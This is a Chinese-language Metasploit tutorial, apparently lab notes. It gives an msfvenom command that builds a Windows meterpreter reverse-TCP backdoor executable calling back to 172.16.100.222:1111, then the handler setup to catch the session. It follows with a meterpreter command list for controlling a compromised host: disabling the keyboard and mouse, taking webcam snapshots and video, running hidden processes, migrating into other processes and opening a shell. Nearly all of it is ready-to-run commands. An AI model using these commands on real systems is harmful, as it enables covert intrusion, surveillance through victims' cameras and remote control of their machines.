一、网络架构
二、MSF实现主机1上线
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.222 lport=1111 -f exe >
/home/share/1111.exe
生成监听器
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1111
run
在被入侵的主机上,执行后门后,此时会发现上线成功
三、MSF的命令
基本系统命令
background #将当前会话放置后台,然后可以再运行其他模块进行提权
sessions #sessions –h 查看帮助
sessions -i <ID值> #进入会话 -k 杀死会话
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill <PID值> 杀死进程
idletime #查看目标机发呆(无操作)时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shell
uictl开关键盘、鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
执行exe文件
execute -f #命令在目标主机上执行应用程序
execute -f c:\\111.exe
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate进程迁移
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中,
kill <pid值> #杀死进程